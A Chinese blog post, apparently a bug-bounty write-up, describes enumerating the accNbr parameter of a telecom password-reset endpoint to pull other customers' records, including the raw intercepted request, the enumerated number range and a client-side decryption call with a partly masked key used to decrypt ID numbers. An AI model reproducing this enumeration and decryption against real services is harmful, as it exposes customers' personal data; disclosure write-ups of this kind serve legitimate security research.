记录一次敏感信息泄露漏洞 id 可遍历 给到高危

已于 2024-05-30 16:49:54 修改
阅读量324 收藏 2
点赞数 2
分类专栏: web安全 文章标签: 安全 网络安全 web安全
于 2024-05-10 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63279914/article/details/138474211
版权

敏感信息泄露 可遍历

在这里插入图片描述

1、点击额重置密码

需要 校园电信手机号

个人手机账号:193xxxxxx02 获取验证码 发现验证码登陆点击登陆

在这里插入图片描述

burpsuit抓包,抓到查询接口

接口

POST /wap_heb/public/resetPwdDeal.jsp?wBqy93ym=uzeSMGlqEDAMFv4Yrd7e2RD5DzehOihK44EZAuBz02NRhUfmGik2Eh.ksL6M HTTP/1.1
Host: x_heb.189.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 48
Connection: close
Cookie: route=8f6d1541b90bd9713d0ace; JSESSIONID=5EA12DAF530BE0B842490; 9mpg8NnStfi5S=5w5ZBzili0UbMfIoSiTVKD_9xuHOdNZ3fiIckp4fjsimbKNrNa9ztanDG2MsGVpmoUnrEYScIa2r85NNxuo3_Iq; insert_cookie=56365047; 9mpg8NnStfi5T=eFjX7GxxsXPCugriDKlYL_cpTAL4Xg.2imVssfBake1f00tQ95NRSYiWJSN1T6_N1GPWkdRI4wf8NdZeojoBMRsbWqxk7SmcYJcJTD1ewzHYwG8XaYr9iqXYHs4_OByQkHDQji7iIUdHa3qfVptQA4MgeRUflggc4J9GPtt4Mn3iyxw8OOs_pPgK.8PGhaHOotLmyUrXXPbDabCMqmcHoh_VXZ2DoHK3_.lGUUaTR2O4HfwIJaB8JZGrLBxC5Bygs2im0bcEQg_oPCP9QQoIgs6bmqOHgJ1t6CmD5USH2roMOLMlbDstIr.37Fwb_xZW4XxmIprEcyEQ

accNbr=xxxxxxxx3635&action=qryOwnerAndUserInfo

accnbr 可以遍历

修改 accnbr的值 得到返回结果

在这里插入图片描述

遍历后五位 从 xxxxxxx36525 到 xxxxxx37000

在这里插入图片描述

返回结果是加密字符串

在js代码中搜索返回字段名

在这里插入图片描述

发现解密密钥和方法

strDecode(json.certNumber,"xxxxxxxR7K!lLhOq","xxxxxxx8","xxxxxxxxnst")

找页面的js代码 ,看是否有解密的代码

在这里插入图片描述

找到解密js代码 复制到 vscode中 调用strDecode方法解密

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

零星_AagT
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
信息泄露漏洞
jelly
07-27 6622
前言:信息泄露包括的内容很广泛,很多漏洞都可以归为信息泄露类的漏洞,所以这类漏洞需要去细细消化其中的每个技术. 本篇笔记主要参考burp学院的信息泄露相关内容 什么是信息泄露 是指网站无意间向用户泄露敏感信息。根据上下文,网站可能会将各种信息泄漏给潜在的攻击者,包括: 有关其他用户的数据,例如用户名或财务信息 敏感的商业或商业数据 有关网站及其基础架构的技术细节 泄露敏感的用户或业务数据的危险相当明显,但泄露技术信息有时可能同样严重。尽管某些信息用途有限,但它可能是暴露其他攻击面的起点,其中可能包含其他
绕过漏洞危害_一次文件读取漏洞的“危害升级”历程
weixin_29518761的博客
01-13 128
在授权测试某金融类APP时,发现一个鸡肋低危文件读取漏洞,尝试将其升级为高危。PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负。0x00 初步探测发现首次打开APP时,会向服务器读取文件加载并展示图片。测试时一定要细心,笔者发现只有首次打开APP时,才会加载图片,后面再打开应该是资源已被记录,就不会向服务器再次进行请求了。此加载展示图片的GET请求数据包如下:GET /ixxx/...
(35.2)【接口漏洞专题】接口遍历、接口调用重放、接口参数篡改、接口未授权访问
04-15 3103
【专题】接口漏洞利用
盘点十八种WEB常见漏洞!!!
logic1001的博客
01-22 1161
本文将详细讨论Web应用程序中常见的漏洞,包括注入漏洞、XSS漏洞、CSRF、SSRF、文件上传漏洞、文件包含漏洞、命令执行漏洞、暴力破解漏洞、访问控制漏洞安全配置错误、安全日志和监控故障、软件和数据完整性故障、身份识别和身份验证错误、自带缺陷和过时的组件、失效的访问控制、加密机制失效、不安全设计以及未验证的重定向和转发。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
常见中高危漏洞修复建议(汇总)
weixin_59047731的博客
04-16 778
【代码】常见中高危漏洞修复建议(汇总)
敏感信息泄漏
u011215939的博客
12-19 6173
敏感信息泄漏
SRC高危漏洞实战——破解加密流程发现的大量信息泄漏
ooooooih的博客
04-26 1159
​ 上篇文章[SRC漏洞挖掘——常见数据加密传输方式解析]分析了一下目前常见的WEB端传输加解密流程,下面分享一个我之前实战的一个某SRC高危例子,就是通过分析加密方式篡改了请求包,进而拿到了大量用户敏感数据。
扒一扒过去一年K8S高危漏洞都有哪些?
力哥讲技术
03-13 1208
在过去的一年里,Kubernetes继续稳固其在关键基础设施领域的地位,成为无论是小型还是大型组织都广受欢迎的选择。然而,随着更多开发人员将Kubernetes部署与其他云原生组件相结合,构建出更加完善的工作系统时,这也使得Kubernetes更容易遭受攻击。更多的组件和更加复杂的基础架构也增加了易受攻击的范围,这是需要我们运维人员关注的。根据 Red Hat 的2022 年 Kubernetes 安全状况报告:https://www.redhat.com/rhdc/managed-files/cl-sta
2023 HW 必修高危漏洞集合
holyxp的博客
07-21 3119
高危风险漏洞一直是企业网络安全防护的薄弱点,也成为 HW 攻防演练期间红队的重要突破口;每年 HW 期间爆发了大量的高危风险漏洞成为红队突破网络边界防护的一把利器,很多企业因为这些高危漏洞而导致整个防御体系被突破、甚至靶标失守而遗憾出局。HW 攻防演练在即,输出HW 必修高危漏洞手册,意在帮助企业在 HW 攻防演练的前期进行自我风险排查,降低因高危漏洞而“城池失守”的风险。
奇安信安全扫描漏洞解决路径遍历和存储型xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
一次遍历删除倒数第n个节点
08-08
一次遍历单链表删除倒数第n个节点的问题,跟删除某个节点的前一个节点是一个思路
jquery将信息遍历到界面上实例代码
10-15
在本篇文章里小编给大家整理了关于jquery如何将信息遍历到界面上的实例代码内容,需要的朋友们可以参考下。
学生出勤记录 I(一次遍历+计数统计)1
08-03
"学生出勤记录 I(一次遍历+计数统计)" 以下是从给定的文件中生成的相关知识点: 标题解释 标题 "学生出勤记录 I(一次遍历+计数统计)1" 表明这是一个 LeetCode 题目,旨在判定学生的出勤记录是否符合奖赏的...
信息安全技术:目录遍历漏洞利用.pptx
11-01
信息安全技术基础
等保测评和安全运维
weixin_64392888的博客
06-11 630
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1318
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 228
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
如何记录遍历到每一列的第一个白色像素
06-03
如果你想要记录遍历到每一列的第一个白色像素的位置,可以参考以下代码: ```matlab % 读取二值图像 bw_img = imread('binary_image.png'); % 获取图像的宽度和高度 [height, width] = size(bw_img); % 初始化记录第一个白色像素位置的数组 first_white_pixels = zeros(1, width); % 遍历图像中的所有像素 for col = 1:width % 初始化记录当前列第一个白色像素位置的变量 row_with_white_pixel = 0; % 遍历当前列的所有像素 for row = 1:height % 获取当前像素的值 pixel_value = bw_img(row, col); % 如果当前像素是白色像素 if pixel_value == 1 % 记录当前列第一个白色像素的位置 row_with_white_pixel = row; % 跳出当前列的遍历循环 break; end end % 记录当前列第一个白色像素的位置 first_white_pixels(col) = row_with_white_pixel; end ``` 在上述代码中,`imread`函数用于读取二值图像。然后使用`size`函数获取图像的宽度和高度。接着初始化记录第一个白色像素位置的数组,并使用两个`for`循环遍历图像中的所有像素。在外层循环中,使用索引`col`遍历每一列。在内层循环中,使用索引`row`遍历当前列的所有像素。如果找到了当前列的第一个白色像素,就记录它的位置并跳出内层循环。在外层循环的循环体中,记录当前列第一个白色像素的位置。最后,`first_white_pixels`数组中保存了遍历到每一列的第一个白色像素的位置。 希望这可以帮到你!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值